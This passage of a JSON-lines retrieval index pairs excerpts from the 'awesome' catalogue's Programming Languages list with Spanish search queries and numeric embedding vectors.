-0.09024, -0.04171, 0.01168, -0.01187, -0.03728, -0.03627, -0.04835, -0.05666, 0.06351, -0.02742, -0.06728, -0.00615, 0.0756, -0.04209, 0.01969, -0.00534, 0.10883, 0.01916, -0.05002, 0.10262, 0.01258, -0.05495, -0.02128, 0.00753, -0.04933, 0.02271, 0.02741, 0.03113, -0.00422, 0.03301, 0.03438, 0.01022, -0.01633, 0.06799, 0.08956, -0.0103, 0.0103, -0.03119, -0.00407, -0.05171, 0.01514, 0.04374, 0.03274, -0.0396, -0.02995, -0.031, -0.0208, 0.03162, 0.05742, -0.07455, -0.01401, -0.03389, 0.00878, -0.10071, 0.00219, -0.01141, -0.02478, -0.04881, 0.08723, 0.01049, -0.00601, 0.02188, -0.02619]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: JavaScript. Promises. Standard Style β€” Style guide and linter. Must Watch Talks. Tips. Network Layer. Micro npm Packages. Mad Science npm Packages β€” Impossible sounding projects that exist. Maintenance Modules β€” For npm packages. npm β€” Package manager. AVA β€” Test runner. ESLint β€” Linter. Functional Programming. Observables. npm scripts β€” Task runner. 30 Seconds of Code β€” Code snippets you can understand in 30 seconds. Ponyfills β€” Like polyfills but without overriding native APIs. Swift β€” Apple's compiled programming language that is secure, modern, programmer-friendly, and fast. Education. Playgrounds. Python β€” General-purpose programming language designed for readability. Asyncio β€” Asynchronous I/O in Python 3. Scientific Audio β€” Scientific research in audio/music. CircuitPython β€” A version of Python for microcontrollers. Data Science β€” Data analysis and machine learning. Typing β€” Optional static typing for Python. MicroPython β€” A lean and efficient implementation of Python 3 for microcontrollers. Rust.", "indexar": "con que puedo hacer anΓ‘lisis de datos cientΓ­ficos o aprendizaje automΓ‘tico?", "v": [-0.01951, 0.11091, -0.04436, -0.19703, -0.03193, -0.08632, -0.06017, -0.01755, -0.1997, -0.04451, -0.02894, -0.16643, -0.06318, 0.01898, 0.06528, 0.01009, 0.12951, -0.04322, -0.03505, -0.02558, -0.008, -0.19243, -0.06487, -0.06036, 0.01165, 0.01617, -0.02428, 0.05895, -0.05929, 0.18243, -0.03625, 0.15873, 0.00896, -0.03441, -0.10726, 0.13135, -0.07019, 0.03624, -0.00976, 0.03942, -0.08663, -0.00222, -0.06606, -0.00802, 0.09376, 0.06898, -0.0639, 0.06079, -0.02091, -0.07766, 0.00444, 0.04767, 0.03771, -0.07133, -0.04142, -0.02877, 0.12822, -0.00565, 0.10921, -0.06653, -0.03014, 0.07868, 0.00884, 0.03426, 0.0457, -0.05202, 0.09995, 0.11016, -0.01735, 0.11148, 0.03931, 0.0108, 0.01084, -0.10196, 0.02644, 0.06652, -0.01762, 0.11013, 0.04646, -0.08529, -0.1299, -0.01359, -0.05951, -0.02758, 0.08892, 0.0539, 0.01893, -0.05753, 0.00871, -0.04666, -0.02906, 0.13972, -0.01892, 0.04582, 0.07372, 0.07082, 0.0634, -0.13834, -0.03232, 0.0721, -0.02538, 0.0074, 0.02701, 0.10132, 0.03439, 0.13256, 0.02213, -0.0296, -0.0814, -0.03074, -0.02764, -0.01096, -0.0502, -0.10337, 0.01211, 0.02598, 0.00231, 0.03444, -0.05313, 0.02896, -0.01652, 0.01595, -0.01378, -0.05105, -0.06133, -0.04488, 0.03348, 0.05619, 0.13498, 0.03405, 0.02504, -0.0053, -0.0482, -0.04204, 0.081, 0.06042, -0.05171, -0.03572, -0.0877, -0.02238, 0.01944, 0.08903, -0.0721, -0.00269, 0.03372, -0.06754, 0.04604, 0.0189, -0.01205, -0.04012, -0.06309, 0.01548, 0.03682, 0.06317, -0.05232, -0.03705, 0.02787, -0.08797, 0.01404, -0.01056, 0.01755, 0.12391, 0.0336, 0.01758, 0.05282, -0.00819, 0.00378, -0.02949, 0.01179, 0.04266, -0.12277, 0.052, -0.0188, -0.11091, 0.0734, 0.00882, -0.01582, -0.04087, -0.02259, -0.09505, -0.00418, -0.03066, -0.05506, -0.09328, 0.01327, -0.03167, 0.07525, -0.04334, 0.05662, -0.00899, -0.00952, 0.09965, 0.03723, -0.03922, 0.07147, -0.08659, 0.02078, 0.06877, 0.05918, -0.01175, -0.00854, 0.07768, 0.01127, -0.0271, -0.07069, 0.06281, 0.00545, 0.01688, 0.00981, -0.06641, 0.0122, -0.05972, 0.11536, -0.05558, -0.10283, -0.04799, 0.02171, -0.00988, -0.02979, 0.01358, -0.00729, 0.05394, 0.07831, -0.00367, -0.04644, 0.00508, 0.03179, 0.02601, 0.02926, -0.01155, 0.0064, 0.05756, 0.0356, -0.01812, 0.08309, 0.02994, -0.03522, -0.03384, -0.07022, -0.02517, 0.03818, 0.03695, -0.03795, -0.02699, -0.00473, -0.05469, -0.03568, 0.07384, 0.02233, -0.09652, -0.01943, -0.01491, 0.01732, -0.03487, 0.02583, 0.02261]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Pest β€” Parser generator. Haskell. PureScript. Go. Scala. Scala Native β€” Optimizing ahead-of-time compiler for Scala based on LLVM. Ruby. Clojure. ClojureScript. Elixir. Elm. Erlang. Julia β€” High-level dynamic programming language designed to address the needs of high-performance numerical analysis and computational science. Lua. C/C++ β€” General-purpose language with a bias toward system programming and embedded, resource-constrained software. R β€” Functional programming language and environment for statistical computing and graphics. Learning. D. Common Lisp β€” Powerful dynamic multiparadigm language that facilitates iterative and interactive development. Learning. Perl. Groovy. Dart. Java β€” Popular secure object-oriented language designed for flexibility to \"write once, run anywhere\". RxJava. J2ME β€” Java specification designed for old keypad phones and PDAs. Kotlin. OCaml. ColdFusion. Fortran. PHP β€” Server-side scripting language. Composer β€” Package manager. Pascal. AutoHotkey. AutoIt. Crystal.", "indexar": "cual es una alternativa libre a Java para programar aplicaciones?", "v": [-0.02278, 0.05966, -0.04995, -0.1879, -0.07972, -0.0727, 0.06915, -0.05071, -0.14003, -0.00887, -0.02399, -0.21463, -0.02854, 0.06404, 0.04369, 0.03505, 0.1119, -0.07232, 0.07901, 0.02521, -0.07409, 0.12774, -0.12217, -0.11367, -0.09267, 0.08357, -0.00422, 0.02119, -0.10009, -0.03237, 0.01328, -0.04632, 0.16231, -0.13948, -0.08, 0.04688, 0.12719, -0.02812, -0.03564, -0.00721, 0.09115, 0.03911, 0.02266, 0.00641, -0.03014, 0.06665, 0.08951, 0.02244, -0.05816, -0.01592, -0.09986, 0.05274, -0.05867, 0.0799, 0.09809, -0.06947, 0.07059, -0.16666, -0.02789, -0.10356, -0.08905, 0.07653, -0.0366, -0.06036, 0.0704, 0.00144, 0.07034, 0.018, -0.0848, 0.04671, 0.04764, 0.08458, -0.0764, -0.02512, -0.01754, 0.06486, -0.05207, -0.03184, 0.05811, 0.01269, -0.05052, -0.09841, 0.03475, 0.02929, -0.01337, -0.06419, 0.0531, -0.01376, -0.00757, 0.00859, 0.03771, 0.02264, -0.01344, 0.08238, 0.09926, -0.06643, 0.1124, 0.155, 0.13242, 0.09662, 0.01388, -0.06982, -0.09866, -0.0371, -0.06995, 0.0582, 0.01762, -0.07034, -0.07742, -0.00263, 0.05665, -0.02002, 0.05588, 0.01977, -0.04336, -0.05934, 0.00163, -0.05254, 0.0185, -0.01864, -0.06529, -0.02977, -0.02548, -0.04181, 0.06691, 0.03542, -0.02531, 0.16256, -0.07443, 0.05634, 0.046, -0.06867, -0.06431, -0.00742, -0.13165, 0.07353, 0.12386, -0.05767, 0.06872, 0.00288, -0.00394, 0.07721, 0.04227, 0.05655, 0.07516, 0.04204, 0.02428, 0.00163, 0.01817, -0.02583, 0.00721, -0.01981, -0.0516, 0.11823, -0.12371, -0.0396, -0.01826, -0.03489, -0.04088, 0.05582, -0.05406, 0.01331, -0.07224, -0.03153, -0.01521, -0.06622, 0.01639, -0.01961, 0.01685, 0.09057, 0.01893, 0.10024, 0.09557, -0.06343, 0.05444, -0.05934, 0.00014, -0.06925, -0.02799, -0.0622, -0.05179, 0.00076, -0.00179, -0.02873, -0.00207, -0.03501, 0.01785, -0.01679, -0.03544, 0.01083, -0.03763, 0.0821, -0.01131, -0.05557, -0.02273, 0.01204, -0.01191, -0.10033, -0.02585, -0.01468, -0.06035, -0.00051, -0.05363, -0.02164, 0.03088, 0.06538, -0.03395, 0.01338, 0.0073, 0.08595, 0.01752, 0.02124, 0.04196, 0.06096, -0.03717, -0.07814, 0.01597, 0.04746, 0.04758, -0.01078, -0.00886, -0.01954, -0.00113, 0.00778, -0.01053, -0.00769, 0.00703, 0.05665, -0.02103, 0.023, 0.02979, -0.03392, -0.02972, -0.02235, -0.01188, 0.02453, 0.00761, -0.0124, 0.00846, -0.04037, -0.0094, 0.087, -0.00984, -0.05775, -0.05702, -0.03859, -0.08526, -0.02282, -0.0537, -0.05461, -0.0341, 0.08053, 0.07837, 0.01421, 0.00571, -0.00093]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Pest β€” Parser generator. Haskell. PureScript. Go. Scala. Scala Native β€” Optimizing ahead-of-time compiler for Scala based on LLVM. Ruby. Clojure. ClojureScript. Elixir. Elm. Erlang. Julia β€” High-level dynamic programming language designed to address the needs of high-performance numerical analysis and computational science. Lua. C/C++ β€” General-purpose language with a bias toward system programming and embedded, resource-constrained software. R β€” Functional programming language and environment for statistical computing and graphics. Learning. D. Common Lisp β€” Powerful dynamic multiparadigm language that facilitates iterative and interactive development. Learning. Perl. Groovy. Dart. Java β€” Popular secure object-oriented language designed for flexibility to \"write once, run anywhere\". RxJava. J2ME β€” Java specification designed for old keypad phones and PDAs. Kotlin. OCaml. ColdFusion. Fortran. PHP β€” Server-side scripting language. Composer β€” Package manager. Pascal. AutoHotkey. AutoIt. Crystal.", "indexar": "hay algun lenguaje de alto rendimiento optimizado para anΓ‘lisis numΓ©rico?", "v": [-0.16885, 0.01252, -0.10969, -0.15943, -0.01928, -0.08018, -0.09957, 0.02108, -0.21489, -0.07266, -0.03516, -0.091, 0.00781, 0.01659, 0.16567, 0.02649, 0.05382, 0.00831, -0.06011, -0.03446, -0.02797, -0.09097, -0.15583, -0.04226, 0.11991, 0.00671, -0.02715, 0.07319, -0.04789, -0.00353, -0.08519, 0.11709, 0.04418, -0.14566, -0.05336, 0.08403, -0.01786, 0.06448, 0.02375, 0.12309, -0.02227, 0.03203, -0.02999, -0.09375, 0.14501, -0.00964, -0.00549, 0.06299, 0.06562, -0.11872, 0.09734, -0.07463, 0.048, -0.13575, -0.02472, 0.01626, 0.07576, -0.01027, 0.0924, -0.20462, 0.03778, 0.01148, 0.04433, -0.12452, 0.02329, 0.00592, -0.02269, 0.00369, 0.07824, 0.01045, -0.01778, 0.04099, -0.03858, 0.0548, 0.14207, 0.04314, 0.00295, 0.06141, 0.0431, -0.00888, 0.0175, -0.06174, -0.07529, -0.00151, -0.16957, -0.02474, 0.03237, -0.10911, 0.04441, 0.05994, -0.02529, -0.05442, -0.11295, -0.09645, -0.11755, -0.00389, 0.06625, -0.06818, 0.03549, 0.04284, 0.06909, -0.06367, -0.06352, 0.02686, 0.02307, 0.12422, 0.00145, -0.10756, -0.05093, 0.06783, 0.04409, -0.07584, 0.01944, -0.10198, -0.06825, -0.04068, 0.05917, -0.03954, 0.03489, -0.07425, -0.01656, 0.03281, -0.04277, -0.06074, -0.04764, -0.05107, 0.07962, 0.06145, 0.11439, -0.03784, 0.02348, -0.04039, 0.01019, -0.0167, -0.04401, 0.09461, 0.08719, 0.01868, -0.01655, -0.00211, -0.01917, 0.05767, -0.07177, 0.03475, 0.0922, 0.04318, 0.02628, -0.04449, -0.05082, 0.0519, 0.10076, -0.00692, 0.06039, 0.02781, -0.04972, -0.062, 0.02659, -0.00566, -0.08266, -0.00429, -0.02121, -0.04981, 0.02741, 0.05012, 0.09993, -0.00822, -0.00319, 0.00683, 0.11299, 0.01193, -0.03569, -0.07572, 0.03927, -0.07883, 0.01157, 0.04745, 0.04564, 0.05937, -0.0087, -0.01006, -0.00639, -0.06849, -0.0333, -0.04364, 0.01524, -0.01852, 0.04426, -0.02915, -0.00226, -0.08906, 0.06301, 0.03337, -0.01512, -0.11004, 0.06153, -0.07869, -0.01936, -0.08534, 0.01736, -0.0332, -0.01572, -0.02192, 0.02898, -0.01589, 0.00664, 0.10969, -0.00511, -0.05474, 0.00298, 0.09296, 0.00811, -0.01832, -0.00623, 0.01293, -0.01194, 0.00335, -0.02129, 0.02242, 0.02377, -0.03663, 0.011, -0.01235, 0.01615, -0.02178, -0.02572, 0.01255, -0.01241, -0.02759, 0.02083, -0.0047, -0.05005, 0.04215, 0.02286, 0.03127, -0.0001, 0.0072, -0.04341, -0.00247, 0.03041, -0.05512, -0.01492, 0.00972, -0.04466, -0.0314, -0.02507, 0.00032, -0.04976, -0.02414, -0.01882, -0.04678, 0.02964, -0.01268, -0.03268, -0.04713, 0.06564, -0.00135]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: Pest β€” Parser generator. Haskell. PureScript. Go. Scala. Scala Native β€” Optimizing ahead-of-time compiler for Scala based on LLVM. Ruby. Clojure. ClojureScript. Elixir. Elm. Erlang. Julia β€” High-level dynamic programming language designed to address the needs of high-performance numerical analysis and computational science. Lua. C/C++ β€” General-purpose language with a bias toward system programming and embedded, resource-constrained software. R β€” Functional programming language and environment for statistical computing and graphics. Learning. D. Common Lisp β€” Powerful dynamic multiparadigm language that facilitates iterative and interactive development. Learning. Perl. Groovy. Dart. Java β€” Popular secure object-oriented language designed for flexibility to \"write once, run anywhere\". RxJava. J2ME β€” Java specification designed for old keypad phones and PDAs. Kotlin. OCaml. ColdFusion. Fortran. PHP β€” Server-side scripting language. Composer β€” Package manager. Pascal. AutoHotkey. AutoIt. Crystal.", "indexar": "con que programa puedo generar parsers o compilar cΓ³digo para varias plataformas?", "v": [0.09815, -0.00676, -0.05962, -0.1961, -0.01697, -0.2239, 0.16459, 0.01417, -0.14914, -0.19396, -0.00048, -0.02996, 0.0335, -0.11915, 0.02687, -0.02374, 0.04043, -0.07711, 0.07405, 0.02859, -0.00995, 0.03165, -0.02487, -0.17543, 0.02872, -0.00129, -0.00683, -0.04967, -0.06478, -0.10511, -0.03241, -0.01431, 0.0768, -0.09516, -0.1388, 0.0206, 0.06154, 0.13374, -0.08979, 0.03112, -0.05655, 0.11189, -0.06538, 0.03972, -0.00095, -0.02075, 0.05418, 0.01277, 0.04843, -0.06052, -0.01795, 0.01548, -0.13625, 0.083, 0.04855, -0.11392, 0.0313, -0.17089, -0.06872, 0.03422, 0.07519, -0.03826, 0.07854, -0.11754, -0.03211, 0.0532, 0.07413, 0.02517, -0.06414, 0.11752, 0.01563, 0.11986, -0.01351, -0.04865, 0.04614, 0.07532, -0.0518, -0.1664, 0.00591, 0.07285, -0.04865, -0.01103, 0.00832, -0.0089, 0.02069, 0.00804, 0.02695, -0.06768, 0.02077, -0.10035, 0.06422, -0.01027, 0.03188, 0.07457, 0.04286, -0.10025, 0.12292, 0.05318, -0.04233, 0.00517, 0.01278, -0.09689, -0.06627, 0.05345, 0.03752, 0.13486, 0.05586, -0.0196, -0.00604, 0.06176, 0.05505, -0.03048, -0.04515, -0.0043, -0.09996, -0.00877, -0.0339, 0.04948, 0.04855, -0.05779, -0.05951, 0.05931, -0.10234, 0.02866, 0.11923, 0.04313, -0.00063, 0.10403, -0.05117, -0.0145, -0.06683, -0.05877, -0.04206, -0.04309, -0.04653, -0.03654, 0.09495, 0.0193, 0.06281, 0.0116, -0.01736, 0.08262, 0.04265, 0.14832, 0.01089, 0.01718, -0.04395, -0.08861, -0.05915, -0.04062, 0.01603, 0.06098, -0.05026, 0.00469, -0.12376, -0.00975, 0.06596, 0.02515, -0.05434, 0.02813, -0.0391, 0.00239, -0.07247, -0.11236, 0.00614, -0.00853, 0.02546, 0.00124, 0.01203, 0.02259, 0.00097, 0.08912, 0.15741, -0.13265, -0.00491, -6e-05, -0.00027, -0.0324, -0.07935, -0.01882, -0.03271, -0.01096, 0.07224, 0.01246, -0.01409, -0.02723, -0.00318, 0.0349, -0.0316, -0.02483, -0.03071, 0.03578, -0.04726, -0.01383, 0.024, -0.00988, 0.00509, 0.02803, -0.01302, -0.04683, -0.06507, 0.00968, 0.01423, -0.03761, 0.00606, 0.07134, -0.05266, -0.00498, 0.04127, 0.00538, 0.01824, -0.02252, 0.00018, 0.01231, -0.02086, -0.01848, -0.01774, 0.03258, 0.07795, -0.04683, -0.03324, -0.00171, -0.00157, 0.05848, -0.0188, -0.03825, 0.02207, 0.04241, 0.004, -0.00166, 0.00098, -0.05628, -0.00157, 0.00652, 0.02437, 0.00545, -0.03165, 0.03196, -0.03022, -0.01584, -0.03653, 0.00134, 0.00715, -0.03846, -0.01482, 0.02654, -0.01253, -0.04868, -0.00135, -0.01066, -0.05094, -0.00675, 0.01046, -0.04004, 0.01243, 0.04507]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: CMake β€” Build, test, and package software. ActionScript 3 β€” Object-oriented language targeting Adobe AIR. Idris β€” General purpose pure functional programming language with dependent types influenced by Haskell and ML. Ada/SPARK β€” Modern programming language designed for large, long-lived apps where reliability and efficiency are essential. Q# β€” Domain-specific programming language used for expressing quantum algorithms. Imba β€” Programming language inspired by Ruby and Python and compiles to performant JavaScript. Vala β€” Programming language designed to take full advantage of the GLib and GNOME ecosystems, while preserving the speed of C code. Coq β€” Formal language and environment for programming and specification which facilitates interactive development of machine-checked proofs. V β€” Simple, fast, safe, compiled language for developing maintainable software. Move β€” Domain-specific programming language for writing safe smart contracts.", "indexar": "que lenguaje de programaciΓ³n sirve para escribir contratos inteligentes seguros", "v": [0.01136, -0.05701, -0.15205, -0.27817, -0.00114, -0.20719, -0.08971, -0.02234, -0.07952, -0.06889, 0.00625, -0.01484, 0.06277, -0.05133, 0.00921, 0.06801, 0.1399, -0.04487, 0.03603, -0.02023, 0.10545, -0.03017, -0.06481, -0.05732, -0.01844, -0.09062, 0.00458, 0.0043, -0.00074, 0.11947, -0.1212, 0.07695, 0.10856, -0.07992, -0.0627, 0.13431, -0.04286, 0.14358, 0.06015, 0.09294, 0.0446, 0.05828, -0.00352, -0.01362, 0.04489, 0.02652, 0.0204, -0.0786, 0.07667, -0.06645, -0.02511, -0.01352, 0.00669, -0.06381, -0.02857, 0.09521, 0.05653, 0.02988, -0.07022, -0.15134, -0.08987, 0.03429, -0.0245, 0.03614, 0.13066, -0.04211, 0.08016, 0.05021, -0.01588, -0.04484, -0.00233, -0.03708, -0.09596, 0.02063, 0.04744, 0.02954, -0.09569, -0.0468, 0.11414, 0.10992, -0.04821, -0.0069, -0.07001, 0.05605, 0.03577, -0.01587, -0.00485, -0.06387, -0.07635, 0.00663, 0.05532, -0.07119, -0.06152, -0.06265, -0.02889, 0.01204, 0.11068, -0.11086, 0.03735, 0.09615, 0.03585, -0.09498, -0.0426, 0.05838, -0.08069, 0.11418, 0.08091, 0.02972, 0.07, -0.0504, -6e-05, 0.03263, -0.01628, -0.08173, -0.00498, 0.03146, 0.12653, -0.0011, 0.08496, 0.02791, 0.00886, 0.05929, -0.04124, 0.06351, 0.10215, -0.00272, 0.07996, 0.10921, -0.00826, 0.05954, 0.0082, -0.05876, -0.01137, -0.06182, -0.01414, 0.08712, 0.06464, 0.00107, -0.00453, 0.02331, -0.0295, 0.04837, -0.09249, 0.03677, -0.00392, 0.04149, -0.003, -0.00359, -0.01325, 0.05745, -0.04071, 0.05354, -0.0342, 0.12631, -0.03708, -0.06918, 0.0208, -0.02735, -0.10928, 0.03378, 0.00343, -0.01613, -0.00525, 0.04532, 0.09865, 0.00255, -0.07979, -0.00154, 0.1378, 0.08225, 0.02955, 0.01253, 0.10746, -0.02828, -0.04982, 0.00744, 0.00745, 0.07183, -0.05168, -0.11483, -0.05288, -0.01754, -0.10855, -0.00791, 0.05557, 0.00338, 0.02806, -0.03295, -0.01779, -0.05533, -0.05508, 0.03181, -0.02121, -0.02313, -0.0176, -0.05424, -0.11605, -0.05881, 0.04303, -0.09035, 0.01042, 0.03104, 0.06159, 0.02451, 0.02061, 0.05593, -0.01109, -0.00693, -0.03605, 0.0847, 0.00481, -0.02649, 0.04259, 0.03854, 0.01161, 0.01159, -0.04441, 0.0527, 0.04573, 0.05006, 0.02214, -0.08933, 0.00706, -0.03477, -0.00116, -0.06934, 0.00288, 0.0241, 0.00235, 0.01703, -0.0324, 0.00062, -0.03822, 0.03941, -0.02365, 0.04769, -0.06265, 0.01746, -0.00789, -0.02055, -0.01501, 0.02248, -0.06343, -0.08346, -0.02128, -0.02798, -0.0453, -0.01145, -0.00387, 0.00847, -0.03422, -0.01998, 0.00911, -0.04588, 0.0314, 0.0101]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: CMake β€” Build, test, and package software. ActionScript 3 β€” Object-oriented language targeting Adobe AIR. Idris β€” General purpose pure functional programming language with dependent types influenced by Haskell and ML. Ada/SPARK β€” Modern programming language designed for large, long-lived apps where reliability and efficiency are essential. Q# β€” Domain-specific programming language used for expressing quantum algorithms. Imba β€” Programming language inspired by Ruby and Python and compiles to performant JavaScript. Vala β€” Programming language designed to take full advantage of the GLib and GNOME ecosystems, while preserving the speed of C code. Coq β€” Formal language and environment for programming and specification which facilitates interactive development of machine-checked proofs. V β€” Simple, fast, safe, compiled language for developing maintainable software. Move β€” Domain-specific programming language for writing safe smart contracts.", "indexar": "cual es una alternativa libre a CMake para compilar software", "v": [-0.10579, 0.02871, -0.05018, -0.02792, -0.06879, -0.2496, -0.02821, 0.04104, -0.25895, -0.09595, -0.04017, -0.15514, -0.01796, -0.03799, 0.08229, -0.08793, 0.03747, -0.20142, 0.13797, 0.06844, 0.02652, -0.02035, -0.09197, -0.0951, -0.04848, 0.02769, 0.02026, 0.00629, -0.06814, -0.06868, 0.10936, -0.00294, 0.1051, -0.04274, -0.03119, -0.00916, 0.10359, -0.00899, -0.02068, -0.01241, -0.00476, -0.09469, -0.07331, 0.07599, 0.0043, -0.0534, 0.04425, 0.01179, 0.04658, 0.00711, -0.08896, 0.05158, -0.08665, 0.03841, 0.12249, -0.07267, 0.04201, -0.08008, -0.03824, -0.02864, -0.03749, 0.1033, 0.00676, -0.0331, 0.02249, 0.05584, -0.07555, -0.09305, -0.09624, 0.08768, 0.06179, 0.05467, 0.06454, -0.05938, -0.07848, 0.0404, -0.11244, -0.05943, 0.02346, 0.02442, 0.03331, -0.07745, 0.02451, 0.00737, -0.03415, -0.08144, 0.16366, -0.09799, 0.02576, 0.01728, 0.03551, -0.02644, -0.07627, 0.1546, 0.05684, -0.08455, 0.10953, 0.08969, -0.02593, 0.08708, -0.00159, -0.02933, -0.0967, 0.0311, -0.07367, -0.02705, -0.00893, -0.01937, -0.07596, 0.01625, 0.02704, 0.06579, 0.03059, 0.07427, -0.01231, -0.08191, 0.0365, 0.00041, 0.02442, -0.00068, 0.0722, -0.00143, -0.13638, -0.09803, 0.05762, 0.04674, 0.01375, 0.05753, -0.08663, 0.04069, 0.00611, -0.10603, -0.10129, -0.10616, -0.07336, -0.06279, 0.09044, -0.02615, 0.08342, -0.00409, -0.03776, 0.05446, -0.02806, 0.01437, 0.08072, -0.01867, -0.01524, 0.01578, -0.00822, -0.07227, -0.01354, 0.05512, -0.04328, 0.09158, -0.09215, 0.05031, 0.00972, 0.06015, -0.03841, 0.04258, 0.0287, 0.00118, -0.00358, -0.0739, -0.02184, -0.03502, 0.00799, 0.00337, -0.06602, 0.02684, 0.00341, 0.12696, 0.07866, -0.0601, 0.00911, -0.10301, 0.0246, -0.1017, -0.06211, -0.06675, 0.01237, 0.02654, 0.00665, -0.00546, 0.00535, -0.04403, -0.01037, -0.00044, -0.00388, -0.03771, -0.04216, 0.03996, -0.03735, -0.13801, 0.03315, 0.03566, -0.00448, -0.03722, 0.00745, -0.00812, -0.10615, -0.02696, -0.02713, -0.05004, 0.04968, 0.0299, -0.00186, 0.05914, 0.01343, 0.03794, 0.01993, 0.02869, 0.05275, 0.04346, -0.03109, -0.02075, 0.03242, 0.01442, 0.01129, -0.04401, 0.00353, -0.01477, 0.02699, 0.02525, -0.02597, 0.01934, 0.0461, 0.06742, -0.01059, 0.01005, 0.01453, -0.01919, 0.00193, -0.0034, 0.01645, -0.00868, 0.00194, 0.02387, -0.0113, -0.03645, 0.06599, 0.06761, -0.00045, -0.01561, -0.0446, 0.02078, -0.03202, -0.06329, -0.02667, -0.034, -0.0572, 0.01654, 0.00345, -0.01192, -0.01679, -0.00788]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming Languages", "tema": "programming languages", "fuente": "awesome (sindresorhus)", "licencia": "CC0-1.0", "texto": "Catalogo awesome (sindresorhus) / Programming Languages: CMake β€” Build, test, and package software. ActionScript 3 β€” Object-oriented language targeting Adobe AIR. Idris β€” General purpose pure functional programming language with dependent types influenced by Haskell and ML. Ada/SPARK β€” Modern programming language designed for large, long-lived apps where reliability and efficiency are essential. Q# β€” Domain-specific programming language used for expressing quantum algorithms. Imba β€” Programming language inspired by Ruby and Python and compiles to performant JavaScript. Vala β€” Programming language designed to take full advantage of the GLib and GNOME ecosystems, while preserving the speed of C code. Coq β€” Formal language and environment for programming and specification which facilitates interactive development of machine-checked proofs. V β€” Simple, fast, safe, compiled language for developing maintainable software. Move β€” Domain-specific programming language for writing safe smart contracts.", "indexar": "con que puedo desarrollar algoritmos cuΓ‘nticos", "v": [0.03675, -0.04281, -0.02352, -0.08953, 0.15682, -0.05655, 0.08438, 0.11714, -0.14363, -0.01692, -0.00764, -0.12126, 0.08455, 0.00826, 0.10818, 0.02391, 0.13537, -0.10838, -0.0324, 0.01121, 0.0397, -0.07429, -0.1606, -0.0273, 0.09466, -0.08822, -0.02386, 0.05114, -0.09626, 0.0598, -0.07548, 0.04639, 0.07608, -0.1099, -0.06858, -0.03952, -0.10321, 0.0492, 0.05734, 0.07621, -0.03273, 0.0947, -0.08853, -0.07103, 0.09767, 0.07232, -0.09665, 0.05064, 0.02429, -0.15955, -0.03003, -0.06147, -0.03104, -0.05291, 0.01485, -0.01653, 0.09591, -0.03193, 0.02428, -0.01314, 0.03957, 0.08158, 0.04402, 0.04555, 0.0156, -0.04316, -0.05651, 0.13928, -0.03203, 0.0959, 0.02418, 0.13712, -0.02732, 0.10509, 0.06151, 0.101, -0.03679, 0.02307, 0.02854, 0.04416, -0.00529, -0.0126, -0.04102, 0.08015, -0.0672, -0.09376, -0.04174, 0.02514, -0.01603, -0.07817, -0.01912, -0.0261, -0.02634, 0.04841, 0.04885, 0.10625, 0.14163, -0.01638, -0.10513, 0.13736, 0.04831, -0.07746, -0.05734, 0.09252, -0.01255, 0.03867, 0.05976, 0.01467, 0.03918, -0.04067, -0.00558, -0.06802, -0.04289, -0.02064, -0.07331, 0.01415, 0.02585, 0.04031, 0.06308, -0.01584, 0.05082, 0.00372, -0.01525, -0.05363, -0.0041, 0.10705, 0.01245, 0.13994, 0.00043, -0.07041, -0.04253, 0.03166, -0.04665, 0.01088, -0.0426, 0.09413, 0.05255, -0.08917, -0.00291, 0.09539, -0.01487, -0.01731, -0.03383, -0.08156, 0.02631, -0.00441, -0.00692, -0.05681, -0.08267, -0.09554, 0.07328, -0.05407, 0.02066, 0.0748, -0.1351, -0.05627, -0.01437, -0.10026, -0.01804, -0.00233, -0.01033, 0.13394, -0.06768, 0.05224, 0.0216, 0.01582, 0.07513, -0.02617, -0.02477, 0.07503, -0.10858, 0.04264, -0.03375, -0.11022, 0.04981, 0.1125, -0.07947, 0.01973, -0.01158, 0.02673, -0.03754, 0.02228, -0.02994, -0.04647, -0.01439, -0.05936, -0.03624, 0.00017, -0.03574, 0.04531, -0.00851, 0.01137, -0.0153, 0.05056, 0.049, -0.06137, 0.02295, 0.0717, -0.03277, -0.01205, -0.02179, 0.10087, 0.02594, -0.00142, -0.0319, 0.11473, 0.04619, 0.0147, -0.02886, 0.00334, -0.01789, -0.10356, 0.04019, -0.0239, -0.05876, 0.00341, -0.05077, 0.011, 0.0299, -0.00224, 0.01796, 0.02447, 0.00821, 0.00393, 0.02965, 0.00782, 0.00527, 0.08026, 0.05397, -0.04967, -0.05054, 0.00743, -0.01219, 0.00396, 0.01451, 0.02819, -0.04805, -0.11422, -0.02262, -0.0024, -0.06856, 0.00386, 0.04718, -0.06371, -0.01133, -0.05591, -0.04087, -0.0384, -0.05917, -0.04163, -0.0652, 0.03691, 0.06419, -0.07063, 0.06662, 0.00463]} -{"tipo": "pregunta", "herramienta": "Programming Languages", "perfil": "LISTAS", "fichero": "awesome: awesome (sindresorhus) / Programming 